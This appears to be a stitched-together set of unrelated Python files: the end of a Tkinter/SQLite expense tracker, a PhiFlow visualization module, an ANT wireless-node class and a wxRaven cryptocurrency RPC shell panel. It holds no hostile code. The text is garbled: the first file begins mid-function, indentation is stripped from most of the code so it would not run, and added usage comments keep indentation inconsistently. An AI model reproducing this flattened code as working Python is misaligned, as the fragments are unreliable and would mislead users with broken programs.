category_entered = textbox_for_category.get()
if date_entered == "YYYY/MM/DD":
date_entered = date
if name_entered == "Name":
label_for_error = Label(window,text="Please enter a valid name")
label_for_error.grid(row=4,column=3,columnspan=4)
label_for_error.config(bg=bg,fg=fg,font=font)
i += 1
elif name_entered != "Name":
label_for_error = Label(window,bg=bg,fg=fg,font=font,text=" ")
label_for_error.grid(row=4,column=3,columnspan=4)
i = 0
if type_payement == "select":
label_for_error = Label(window,text="Please select a valid type of payement")
label_for_error.grid(row=5,column=1)
label_for_error.config(bg=bg,fg=fg,font=font)
i += 1
elif type_payement != "select":
label_for_error = Label(window,bg=bg,fg=fg,font=font,text=" ")
label_for_error.grid(row=5,column=1,columnspan=4)
if i == 0:
time_ = datetime.datetime.now()
def insert_final_database():
conn = sqlite3.connect(DEFAULT_PATH)
c = conn.cursor()
try:
conn.execute('''CREATE TABLE IF NOT EXISTS TALLY(date TEXT,
name TEXT,
amount INT,
category TEXT,
payement TEXT,
site TEXT,
time TEXT)''')
except Exception as e:
print(e)
c.execute('INSERT INTO TALLY (date , name , amount , category, payement, site,time) VALUES(?, ? ,? , ?, ?, ?, ?)',(date_entered,name_entered,amount_entered,category_entered,type_payement,site_entered,time_))
conn.commit()
c.close()
conn.close()
insert_final_database()
button_to_put_todays_details = Button(frame_debit,text="ADD",bg=button_bg,fg=button_fg,command=insert_into_database)
button_to_put_todays_details.grid(row=7,column=0,pady=10)
button_to_put_todays_details.config(font=font)
label_for_date = Label(window,text=date,bg=bg,fg=fg,font=(font,30))
label_for_date.grid(row=2,column=0,columnspan=1)
label_for_date.config(font=font)
#an unnecessary quit function
def quit():
def sure_quit():
sys.exit()
response1 = messagebox.askyesno("EXIT","Are you sure you want to quit?")
if response1 == 1:
sure_quit()
elif response1 == 0:
pass
        #search the database from the main window by taking the values entered here
        #and passing them to the search api
def search_function():
database_search_window = LabelFrame(window,text="Search",bg=bg,fg=fg,border=5,font=(font,16))
database_search_window.grid(row=3,column=2,columnspan=1,rowspan=10,pady=20,padx=100)
def search():
provided_date = str(textbox_search_date.get())
provided_name = str(textbox_search_name.get())
provided_amount = str(textbox_search_amount.get())
provided_category = str(textbox_search_category.get())
provided_payement = str(payement_search_result.get())
provided_site = str(textbox_for_site_search.get())
if provided_payement == "select":
provided_payement = "Payement"
viewer_api(date1=provided_date,amount1=provided_amount,payement1=provided_payement,site1=provided_site,name1=provided_name,category1=provided_category,file=str(DEFAULT_PATH))
textbox_search_date = Entry(database_search_window,width=20)
textbox_search_date.grid(row=0,column=0,padx=10,pady=10)
textbox_search_date.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_date.insert(0,"Date")
textbox_search_date.bind("<Button-1>",lambda x: remove_text(textbox_search_date))
textbox_search_name = Entry(database_search_window,width=20)
textbox_search_name.grid(row=1,column=0,padx=10,pady=10)
textbox_search_name.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_name.insert(0,"Name")
textbox_search_name.bind("<Button-1>",lambda x: remove_text(textbox_search_name))
textbox_search_amount = Entry(database_search_window,width=20)
textbox_search_amount.grid(row=5,column=0,pady=10,padx=0)
textbox_search_amount.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_amount.insert(0,"Amount")
textbox_search_amount.bind("<Button-1>",lambda x: remove_text(textbox_search_amount))
textbox_search_category = Entry(database_search_window,width=20)
textbox_search_category.grid(row=2,column=0,padx=20,pady=10)
textbox_search_category.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_category.insert(0,"Category")
textbox_search_category.bind("<Button-1>",lambda x: remove_text(textbox_search_category))
payement_search_result = StringVar()
payement_search_result.set("select")
textbox_for_site_search = Entry(database_search_window,width=20)
textbox_for_site_search.grid(row=3,column=0,padx=10,pady=10)
textbox_for_site_search.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_site_search.insert(0,"Site")
textbox_for_site_search.bind("<Button-1>",lambda x: remove_text(textbox_for_site_search))
payement_search = ttk.Combobox(database_search_window,textvariable=payement_search_result)
payement_search['values'] = ("Credited","Debited","select")
payement_search.current(2)
payement_search.grid(row=4,column=0)
payement_search.config(width=15)
button_search = Button(database_search_window,bg=button_bg,fg=button_fg,font=font,text="Search",command=search)
button_search.grid(row=6,column=0,pady=10)
#open the audit viewer
def view():
viewer_api()
def delete():
database_delete_window = LabelFrame(window,text="DELETE",bg=bg,fg=fg,border=5,font=(font,16))
database_delete_window.grid(row=3,column=4,columnspan=1,rowspan=10,pady=20,padx=100)
textbox_get_date = Entry(database_delete_window,width=20)
textbox_get_date.grid(row=0,column=0,padx=10,pady=10)
textbox_get_date.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_get_date.insert(0,"YYYY/MM/DD")
textbox_get_date.bind("<Button-1>",lambda x: remove_text(textbox_get_date))
text_box_get_name = Entry(database_delete_window,width=20)
text_box_get_name.grid(row=1,column=0,padx=10,pady=10)
text_box_get_name.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
text_box_get_name.insert(0,"Name")
text_box_get_name.bind("<Button-1>",lambda x: remove_text(text_box_get_name))
textbox_get_amount = Entry(database_delete_window,width=20)
textbox_get_amount.grid(row=5,column=0,pady=10,padx=0)
textbox_get_amount.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_get_amount.insert(0,"₹")
textbox_get_amount.bind("<Button-1>",lambda x: remove_text(textbox_get_amount))
textbox_get_category = Entry(database_delete_window,width=20)
textbox_get_category.grid(row=2,column=0,padx=20,pady=10)
textbox_get_category.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_get_category.insert(1,"Category")
textbox_get_category.bind("<Button-1>",lambda x: remove_text(textbox_get_category))
clicked_get = StringVar()
chooose_get_option = ttk.Combobox(database_delete_window,textvariable=clicked_get)
chooose_get_option['values'] = ("Credited","Debited","select")
chooose_get_option.config(width=15)
chooose_get_option.current(2)
chooose_get_option.grid(row=4,column=0,padx=10,pady=10)
textbox_for_site_delete = Entry(database_delete_window,width=20)
textbox_for_site_delete.grid(row=3,column=0,padx=10,pady=10)
textbox_for_site_delete.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_site_delete.insert(0,"Site No")
textbox_for_site_delete.bind("<Button-1>",lambda x: remove_text(textbox_for_site_delete))
def delete_final():
date_to_delete = str(textbox_get_date.get())
name_to_delete = str(text_box_get_name.get())
amount_to_delete = int(textbox_get_amount.get())
category_to_delete = str(textbox_get_category.get())
clicked_to_delete = str(clicked_get.get())
textbox_of_site_delete = str(textbox_for_site_delete.get())
conn = sqlite3.connect(DEFAULT_PATH)
c = conn.cursor()
c.execute('DELETE FROM TALLY WHERE date=? AND name=? AND amount=? AND category=? AND payement=? AND site=?',(date_to_delete,name_to_delete,amount_to_delete,category_to_delete,clicked_to_delete,textbox_of_site_delete))
conn.commit()
conn.close()
delete_button_final = Button(database_delete_window,text="Delete",bg=button_bg,fg=button_fg,font=font,command=delete_final)
delete_button_final.grid(row=6,column=0)
def grapher():
graph_window = Toplevel()
graph_window.config(bg=bg)
graph_window.geometry("200x200")
def credited():
threading.Thread(target=graph, args=("Credited",)).start()
def calculator():
try:
os.system("open -a calculator")
except:
os.system("calc")
def help_open():
try:
webbrowser.open(help_path)
except:
messagebox.showerror("Error","Couldn't find a browser/file")
calculator_button = Button(top_status,text="Calculator",command=calculator,width=b_wd)
calculator_button.grid(row=0,column=7)
calculator_button.config(bg=button_bg,fg=button_fg,font=font)
#fullscreen = Button(top_status,bg=button_bg,fg=button_fg,font=font,text="FULL SCREEN",width=b_wd,command=fullscreen)
#fullscreen.grid(row=0,column=4,pady=10)
#theme_button = Button(window,bg=fg,fg=bg,text="Theme",font=font)
#theme_button.grid(row=1,column=6,sticky=W+E,pady=10)
upload_button = Button(top_status,bg=button_bg,fg=button_fg,width=b_wd,font=font,text="Upload",command=upload_to_cloud)
upload_button.grid(row=0,column=3)
help_button = Button(top_status,bg=button_bg,width=b_wd,fg=button_fg,font=font,text="HELP",command=help_open)
help_button.grid(row=0,column=8)
full_database = Button(top_status,width=b_wd,text="View",bg=button_bg,fg=button_fg,font=font,command=view)
full_database.grid(row=0,column=0)
quit_button = Button(top_status,width=b_wd,text="Exit",bg=button_bg,fg=button_fg,font=font,command=quit)
quit_button.grid(row=0,column=10)
graph_button = Button(top_status,width=b_wd,text="GRAPH",command=lambda: graph_canvas(window=window_,window1=put_the_elements,window2=window))
graph_button.grid(row=0,column=4,pady=10)
graph_button.config(bg=button_bg,fg=button_fg,font=font)
def adv_dat():
window.destroy()
advanced_data(window=window_,window1=put_the_elements)
advanced_data_button = Button(top_status,width=10,text="Other Data",command=adv_dat)
advanced_data_button.grid(row=0,column=6,pady=10)
advanced_data_button.config(bg=button_bg,fg=button_fg,font=font)
settings_ = Button(top_status,width=10,text="Settings",bg=button_bg,fg=button_fg,font=font,command=setting)
settings_.grid(row=0,column=9,pady=10)
delete()
search_function()
global end
end = time.time()
print(colored("Audit future rendering completed","green"))
print("["+colored("login","green")+"]","user has been logged in")
time__ = str(datetime.datetime.now())
print("["+colored("logged in at","green")+"]",colored(time__,"yellow"))
print("["+colored("user name","green")+"]",d["name"])
print(colored("first time user:","yellow"),colored(d["first_time"],"green"))
print("["+colored("user theme","green")+"]",d["theme"])
window.mainloop()
put_the_elements()
window_start()
print(colored("App status of last boot:","green"))
print("Time taken to start: "+colored(str(end-start),"yellow")+" Seconds")
|
_vis.py
|
import inspect
import os
from threading import Thread
from ._user_namespace import get_user_namespace, UserNamespace, DictNamespace
from ._viewer import create_viewer, Viewer
from ._vis_base import get_gui, default_gui, Control, display_name, value_range, Action, VisModel, Gui
from ..field import SampledField, Scene
from ..field._scene import _slugify_filename
def show(model: VisModel or None = None, play=True, gui: Gui or str = None, keep_alive=True, **config):
"""
Launch the registered user interface (web interface by default).
This method may block until the GUI is closed.
This method prepares the vis before showing it. No more fields should be added to the vis after this method is invoked.
Also see the user interface documentation at https://tum-pbs.github.io/PhiFlow/Visualization.html
Args:
model: (Optional) `VisModel`, the application to display. If `None`, any pending matplotlib figures are shown via `pylab.show()` instead.
play: If `True` (the default), invokes `App.play()` once the GUI is set up.
gui: (optional) class of GUI to use
keep_alive: Whether the GUI keeps the vis alive. If `False`, the program will exit when the main script is finished.
**config: additional GUI configuration parameters.
For a full list of parameters, see the respective GUI documentation at https://tum-pbs.github.io/PhiFlow/Visualization.html
"""
if model is None:
import pylab
pylab.show()
return
assert isinstance(model, VisModel), f"show() first argument must be an App instance but got {model}"
model.prepare()
# --- Setup Gui ---
gui = default_gui() if gui is None else get_gui(gui)
gui.configure(config)
gui.setup(model)
if play: # this needs to be done even if model cannot progress right now
gui.auto_play()
if gui.asynchronous:
display_thread = Thread(target=lambda: gui.show(True), name="AsyncGui", daemon=not keep_alive)
display_thread.start()
else:
gui.show(True) # may be blocking call
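# A minimal usage sketch (not part of the original module). `MyApp` stands in for
# a hypothetical `VisModel` subclass defined in the calling script, and 'dash' is
# one of the built-in GUI names mentioned in `view()` below:
#
#     app = MyApp()
#     show(app, play=True, gui='dash', keep_alive=True)
#
# Calling `show()` without a model simply falls back to `pylab.show()` and
# displays any pending matplotlib figures.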
RECORDINGS = {}
def record(*fields: str or SampledField) -> Viewer:
user_namespace = get_user_namespace(1)
variables = _default_field_variables(user_namespace, fields)
viewer = create_viewer(user_namespace, variables, "record", "", scene=None, asynchronous=False, controls=(), actions={}, log_performance=False)
viewer.post_step.append(lambda viewer: print(viewer.steps, end=" "))
viewer.progress_unavailable.append(lambda viewer: print())
return viewer
def view(*fields: str or SampledField,
play: bool = True,
gui=None,
name: str = None,
description: str = None,
scene: bool or Scene = False,
keep_alive=True,
select: str or tuple or list = '',
framerate=None,
namespace=None,
**config) -> Viewer:
"""
Show `fields` in a graphical user interface.
`fields` may contain instances of `Field` or variable names of top-level variables (main module or Jupyter notebook).
During loops, e.g. `view().range()`, the variable status is tracked and the GUI is updated.
When called from a Python script, name and description may be specified in the module docstring (string before imports).
The first line is interpreted as the name, the rest as the subtitle.
If not specified, a generic name and description is chosen.
Args:
*fields: (Optional) Contents to be displayed. Either variable names or values.
For field instances, all variables referencing the value will be shown.
If not provided, the user namespace is searched for Field variables.
play: Whether to immediately start executing loops.
gui: (Optional) Name of GUI as `str` or GUI class.
Built-in GUIs can be selected via `'dash'`, `'console'` and `'widgets'`.
See https://tum-pbs.github.io/PhiFlow/Visualization.html
name: (Optional) Name to display in GUI and use for the output directory if `scene=True`.
Will be generated from the top-level script if not provided.
description: (Optional) Description to be displayed in the GUI.
Will be generated from the top-level script if not provided.
scene: Existing `Scene` to write into or `bool`. If `True`, creates a new Scene in `~/phi/<name>`
keep_alive: Whether the GUI should keep running even after the main thread finishes.
framerate: Target frame rate in Hz. Play will not step faster than the framerate. `None` for unlimited frame rate.
select: Dimension names along which one item to show is selected.
Dimensions may be passed as `tuple` of `str` or as comma-separated names in a single `str`.
For each `select` dimension, an associated selection slider will be created.
**config: Additional GUI configuration arguments.
Returns:
`Viewer`
"""
default_namespace = get_user_namespace(1)
user_namespace = default_namespace if namespace is None else DictNamespace(namespace, title=default_namespace.get_title(), description=default_namespace.get_description(), reference=default_namespace.get_reference())
variables = _default_field_variables(user_namespace, fields)
actions = dict(ACTIONS)
ACTIONS.clear()
if scene is False:
scene = None
elif scene is True:
scene = Scene.create(os.path.join("~", "phi", _slugify_filename(name or user_namespace.get_reference())))
print(f"Created scene at {scene}")
else:
assert isinstance(scene, Scene)
name = name or user_namespace.get_title()
description = description or user_namespace.get_description()
gui = default_gui() if gui is None else get_gui(gui)
controls = tuple(c for c in sorted(CONTROL_VARS.values(), key=lambda c: c.name) if user_namespace.get_variable(c.name) is not None)
CONTROL_VARS.clear()
viewer = create_viewer(user_namespace, variables, name, description, scene, asynchronous=gui.asynchronous, controls=controls, actions=actions, log_performance=True)
show(viewer, play=play, gui=gui, keep_alive=keep_alive, framerate=framerate, select=select, **config)
return viewer
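# A minimal usage sketch (not part of the original module), assuming a script that
# holds a `SampledField` variable named `velocity` and a hypothetical `step()` function:
#
#     viewer = view('velocity', play=False, framerate=10)
#     for _ in viewer.range(100):
#         velocity = step(velocity)
#
# Called with no arguments, `view()` picks up every `SampledField` found in the
# calling namespace (see `_default_field_variables` below).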
def _default_field_variables(user_namespace: UserNamespace, fields: tuple):
names = []
values = []
if len(fields) == 0: # view all Fields
user_variables = user_namespace.list_variables(only_public=True, only_current_scope=True)
for name, val in user_variables.items():
if isinstance(val, SampledField):
names.append(name)
values.append(val)
else: # find variable names
user_variables = user_namespace.list_variables()
for field in fields:
if isinstance(field, str):
split = [n.strip() for n in field.split(',')]
names.extend(split)
values.extend([user_namespace.get_variable(n, default=None) for n in split])
else:
for name, val in user_variables.items():
if val is field:
names.append(name)
values.append(field)
return {n: v for n, v in zip(names, values)}
def control(value, range: tuple = None, description="", **kwargs):
"""
Mark a variable as controllable by any GUI created via `view()`.
Example:
```python
dt = control(1.0, (0.1, 10), name="Time increment")
```
The value is returned unchanged; the variable it is assigned to can then be adjusted from the GUI while the script runs.
Args:
value: Initial value. Must be either `int`, `float`, `bool` or `str`.
range: (Optional) Specify range of possible values as `(min, max)`. Only for `int` and `float` values.
description: Description of what the control does.
**kwargs: Additional arguments to determine the appearance of the GUI component,
e.g. `rows` for text fields or `log=False` for float sliders.
Returns:
`value`
"""
assert type(value) in (int, float, bool, str), f"Value must be one of (int, float, bool, str) but got {type(value)}"
calling_code = inspect.stack()[1].code_context[0]
assert 'control' in calling_code and '=' in calling_code, f"control() must be used in a variable assignment statement but context is: {calling_code}"
calling_code = calling_code[:calling_code.index('control')]
var_names = [var.strip() for var in calling_code.split('=')[:-1]]
var_names = [n for n in var_names if n]
for var_name in var_names:
ctrl = Control(var_name, type(value), value, range, description, kwargs)
value_range(ctrl) # checks if valid
CONTROL_VARS[var_name] = ctrl
return value
CONTROL_VARS = {}
def action(fun):
doc = inspect.getdoc(fun)
ACTIONS[Action(fun.__name__, doc)] = fun
ACTIONS = {}
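# A short sketch of how `control` and `action` are meant to be used together with
# `view()` (the names below are illustrative):
#
#     dt = control(1.0, (0.1, 10))   # appears as a slider in the GUI
#
#     @action
#     def reset():
#         """Reset the simulation."""   # the docstring becomes the action description
#         ...
#
# Both registries (CONTROL_VARS and ACTIONS) are read and cleared by `view()`.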
|
node.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import collections
import threading
import logging
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.base.ant import Ant
from ant.base.message import Message
from ant.easy.channel import Channel
from ant.easy.filter import wait_for_event, wait_for_response, wait_for_special
_logger = logging.getLogger("ant.easy.node")
class Node:
def __init__(self):
self._responses_cond = threading.Condition()
self._responses = collections.deque()
self._event_cond = threading.Condition()
self._events = collections.deque()
self._datas = queue.Queue()
self.channels = {}
self.ant = Ant()
self._running = True
self._worker_thread = threading.Thread(target=self._worker, name="ant.easy")
self._worker_thread.start()
def new_channel(self, ctype, network_number=0x00, ext_assign=None):
size = len(self.channels)
channel = Channel(size, self, self.ant)
self.channels[size] = channel
channel._assign(ctype, network_number, ext_assign)
return channel
def request_message(self, messageId):
_logger.debug("requesting message %#02x", messageId)
self.ant.request_message(0, messageId)
_logger.debug("done requesting message %#02x", messageId)
return self.wait_for_special(messageId)
def set_network_key(self, network, key):
self.ant.set_network_key(network, key)
return self.wait_for_response(Message.ID.SET_NETWORK_KEY)
def wait_for_event(self, ok_codes):
return wait_for_event(ok_codes, self._events, self._event_cond)
def wait_for_response(self, event_id):
return wait_for_response(event_id, self._responses, self._responses_cond)
def wait_for_special(self, event_id):
return wait_for_special(event_id, self._responses, self._responses_cond)
def _worker_response(self, channel, event, data):
self._responses_cond.acquire()
self._responses.append((channel, event, data))
self._responses_cond.notify()
self._responses_cond.release()
def _worker_event(self, channel, event, data):
if event == Message.Code.EVENT_RX_BURST_PACKET:
self._datas.put(("burst", channel, data))
elif event == Message.Code.EVENT_RX_BROADCAST:
self._datas.put(("broadcast", channel, data))
elif event == Message.Code.EVENT_TX:
self._datas.put(("broadcast_tx", channel, data))
elif event == Message.Code.EVENT_RX_ACKNOWLEDGED:
self._datas.put(("acknowledge", channel, data))
else:
self._event_cond.acquire()
self._events.append((channel, event, data))
self._event_cond.notify()
self._event_cond.release()
def _worker(self):
self.ant.response_function = self._worker_response
self.ant.channel_event_function = self._worker_event
# TODO: check capabilities
self.ant.start()
def _main(self):
while self._running:
try:
(data_type, channel, data) = self._datas.get(True, 1.0)
self._datas.task_done()
if data_type == "broadcast":
self.channels[channel].on_broadcast_data(data)
elif data_type == "burst":
self.channels[channel].on_burst_data(data)
elif data_type == "broadcast_tx":
self.channels[channel].on_broadcast_tx_data(data)
elif data_type == "acknowledge":
self.channels[channel].on_acknowledge_data(data)
else:
_logger.warning("Unknown data type '%s': %r", data_type, data)
except queue.Empty as e:
pass
def start(self):
self._main()
def stop(self):
if self._running:
_logger.debug("Stoping ant.easy")
self._running = False
self.ant.stop()
self._worker_thread.join()
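if __name__ == "__main__":
    # Minimal usage sketch (not part of the original module): open a receive channel
    # on the public ANT+ network and print broadcast payloads. Requires an ANT USB
    # stick; the device type, period and timeout below are illustrative values only.
    logging.basicConfig(level=logging.INFO)
    ANTPLUS_NETWORK_KEY = [0xB9, 0xA5, 0x21, 0xFB, 0xBD, 0x72, 0xC3, 0x45]

    node = Node()
    node.set_network_key(0x00, ANTPLUS_NETWORK_KEY)

    channel = node.new_channel(Channel.Type.BIDIRECTIONAL_RECEIVE)
    channel.on_broadcast_data = lambda data: print(list(data))
    channel.set_id(0, 120, 0)      # wildcard device number, device type 120 (heart rate)
    channel.set_period(8070)
    channel.set_rf_freq(57)
    channel.set_search_timeout(12)

    try:
        channel.open()
        node.start()               # blocks and dispatches channel events
    except KeyboardInterrupt:
        pass
    finally:
        node.stop()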
|
wxRavenShellLogic.py
|
'''
Created on 13 Dec. 2021
@author: slinux
'''
import wx.aui
#from wxRavenGUI.view import wxRavenDesign
from .wxRavenShellDesign import *
import wx.py as py
import threading
import time
from wxRavenGUI.application.wxcustom import *
import os
wildcard = "Python source (*.py)|*.py|" \
"Compiled Python (*.pyc)|*.pyc|" \
"All files (*.*)|*.*"
class shellMainPanel(wxRavenShellPanel):
'''
classdocs
'''
view_base_name = "RavenRPC Shell"
view_name = "RavenRPC Shell"
parent_frame = None
default_position = "toolbox1"
icon = 'shell' #wx.Bitmap( u"res/default_style/normal/shell.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "toolbox1", viewName= "Shell"):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Left() .Caption( u"wxRavenFrame" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
"""
parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Bottom() .Caption( u"> Shell" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
parentFrame.m_mgr.Update()
parentFrame.Centre( wx.BOTH )
"""
self.view_base_name = "Shell"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self.simpleShell()
#parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#parentFrame.AddInMainFrame(self, "Shell" )
#parentFrame.AddInNotebook(self, "Shell",parentFrame.wxRavenMainBook )
#parentFrame.AddInNotebook(self, "Shell",parentFrame.wxRavenToolBook1 , self.icon)
#parentFrame.AddInNotebook(self, "Shell",parentFrame.wxRavenToolBook2 )
#self.refreshMenuItemList()
#self.Bind(wx.EVT_MENU, self.wxRavenShellPanelOnContextMenu, self.rpcConnexions_dropdown_button)
def UpdateView(self):
pass
def OnRunScriptClicked(self, evt):
#_chddir = wx.FD_CHANGE_DIR
dlg = wx.FileDialog(
self, message="Choose a file",
defaultDir=os.getcwd(),
defaultFile="",
wildcard=wildcard,
style=wx.FD_OPEN |
wx.FD_FILE_MUST_EXIST |
wx.FD_PREVIEW
)
if dlg.ShowModal() == wx.ID_OK:
pathname = dlg.GetPath()
dlg.Destroy()
#if UserQuestion(self, "Run from file path itself ?"):
# os.chdir(os.path.dirname(pathname))
self.RunScript(pathname)
def RunScript(self, filescript):
print(f'Running Script : {filescript}')
self.wxRavenShell.write(f'Running Script : {filescript}')
self.wxRavenShell.execStartupScript(filescript)
def simpleShell(self):
bSizer1 = wx.BoxSizer( wx.VERTICAL )
_locals = {"dev": "this is a test"}
_networkName = self.parent_frame.ConnexionManager.getCurrent()
#_icon = self.parent_frame.GetPluginData("RavenRPC", "_icon")
startupText = """PyRPC Basic Shell for wxRaven - Active Network : %NETWORKNAME%
- network.<command>() execute RPC Raw Commands
- ravencoin.<command>() execute Ravencoin API Commands
- rpc([OptionalName]).<command>() RPC Raw Commands
- api([OptionalName]).<command>() Ravencoin API Commands
"""
startupText = startupText.replace("%NETWORKNAME%", _networkName)
_locals['rpc'] = self.parent_frame.getNetwork
_locals['api'] = self.parent_frame.getRvnRPC
_locals['network'] = self.parent_frame.getNetwork(_networkName)
_locals['ravencoin'] = self.parent_frame.getRvnRPC(_networkName)
_locals['wxRaven'] = self.parent_frame
try:
_addinLocals = self.parent_frame.GetPlugin("RavenRPC").getAddinsLocals()
startupText = startupText + "- All additionals : ["
for _loc in _addinLocals:
_locals[_loc] = _addinLocals[_loc]
startupText = startupText+ " "+ _loc + ", "
startupText = startupText + "]\n"
except Exception as e:
print(str(e))
pass
#advShell = py.crust.Crust(self , intro=startupText , locals = _locals)
self.wxRavenShell = py.shell.Shell(self.m_shellPanel ,-1, introText=startupText, locals = _locals)
bSizer1.Add( self.wxRavenShell, 1, wx.ALL|wx.EXPAND, 5 )
self.Bind(wx.EVT_TOOL, self.OnRunScriptClicked, id= self.m_runPython.GetId())
#self.parent_frame.parentFrame.RessourcesProvider.ApplyThemeOnPanel(self.wxRavenShell)
self.m_shellPanel.SetSizer( bSizer1 )
self.Layout()
class shellAdvancedPanel(wxRavenAdvancedShellPanel):
'''
classdocs
'''
view_base_name = "RavenRPC Advanced Shell"
view_name = "RavenRPC Advanced Shell"
default_position = "toolbox1"
icon = 'shell_adv' # wx.Bitmap( u"res/default_style/normal/shell.png", wx.BITMAP_TYPE_ANY )
_autowsitchNetwork = True
def __init__(self, parentFrame, position = "toolbox1", viewName= "Shell"):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Left() .Caption( u"wxRavenFrame" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
"""
parentFrame.m_mgr.AddPane( self, wx.aui.AuiPaneInfo() .Bottom() .Caption( u"> Shell" ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).Dock().Resizable().FloatingSize( wx.DefaultSize ) )
parentFrame.m_mgr.Update()
parentFrame.Centre( wx.BOTH )
"""
self.view_base_name = "Shell"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._autowsitchNetwork=True
self.m_auiToolBar1.ToggleTool(self.rpcConnexions_autoswitch.GetId(),self._autowsitchNetwork)
self._currentLocalNetworkName= self.parent_frame.ConnexionManager.getCurrent()
self._currentLocalNetworkIcon= self.parent_frame.ConnexionManager.getIcon()
self.helpCommandPannel = None
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#self.defaultShell()
self.waitApplicationReady()
#Replaced by the main plugin data management
#self.parent_frame.ConnexionManager.RegisterOnConnexionChanged(self.setStatusBarActiveNetwork)
def waitApplicationReady(self):
t=threading.Thread(target=self.__waitLoop_T__, args=(self.defaultShell,))
t.start()
def __waitLoop_T__(self,callback):
while not self.parent_frame._isReady:
time.sleep(2)
wx.CallAfter(callback, ())
def defaultShell(self, evt=None):
_locals = {"dev": "this is a test"}
_icon = self.icon
_networkName = ""
if self.getAutoSwitchStateIsChecked() :
_networkName = self.parent_frame.GetPluginData("RavenRPC", "current_connexion")
_icon = self.parent_frame.GetPluginData("RavenRPC", "_icon")
#_locals['network'] = self.parent_frame.getNetwork(_networkName)
else:
_networkName = self._currentLocalNetworkName
_icon = self._currentLocalNetworkIcon
if _networkName == None:
return
startupText = """PyRPC Advanced Shell for wxRaven - Active Network : %NETWORKNAME%
- network.<command>() execute RPC Raw Commands
- ravencoin.<command>() execute Ravencoin API Commands
- rpc([OptionalName]).<command>() RPC Raw Commands
- api([OptionalName]).<command>() Ravencoin API Commands
"""
startupText = startupText.replace("%NETWORKNAME%", _networkName)
_locals['network'] = self.parent_frame.getNetwork(_networkName)
_locals['ravencoin'] = self.parent_frame.getRvnRPC(_networkName)
_locals['rpc'] = self.parent_frame.getNetwork
_locals['api'] = self.parent_frame.getRvnRPC
_locals['wxRaven'] = self.parent_frame
try:
_addinLocals = self.parent_frame.GetPlugin("RavenRPC").getAddinsLocals()
startupText = startupText + "- All additionals from plugins : ["
for _loc in _addinLocals:
_locals[_loc] = _addinLocals[_loc]
startupText = startupText+ " "+ _loc + ", "
startupText = startupText + "]\n"
except Exception as e:
print(str(e))
advShell = py.crust.Crust(self , intro=startupText , locals = _locals)
#advShell = py.crust.CrustFrame(self , locals = _locals)
#advShell.ToggleTools()
_titlePage = "PyRPC Shell (" + _networkName + ")"
#self.wxRavenShell = py.shell.Shell(self ,-1, introText=startupText)
self.wxRavenAdvancedShellPanelNotebook.AddPage(advShell, _titlePage, bitmap = _icon)
def OnContextMenu_ShowNetworkList(self, evt):
self.refreshNetworkMenuItemList()
self.showNetworkListMenu()
def showNetworkListMenu(self):
mposx, mposy = wx.GetMousePosition()
cposx, cposy = self.parent_frame.ScreenToClient((mposx, mposy))
self.parent_frame.PopupMenu( self.rpcConnexions_dropdown_menu, self.parent_frame.ScreenToClient((mposx, mposy)) )
def cleanNetworkList(self):
for i in self.rpcConnexions_dropdown_menu.GetMenuItems():
self.rpcConnexions_dropdown_menu.Delete(i)
def refreshNetworkMenuItemList(self):
if self.rpcConnexions_dropdown_menu.GetMenuItemCount() > 0:
self.cleanNetworkList()
try:
for text in self.parent_frame.GetPluginData("RavenRPC","all_connexion") :
item = self.rpcConnexions_dropdown_menu.AppendRadioItem(-1, text)
if self.getAutoSwitchStateIsChecked() :
if text == self.parent_frame.GetPluginData("RavenRPC","current_connexion"):
item.Check(True)
else:
if text == self._currentLocalNetworkName:
item.Check(True)
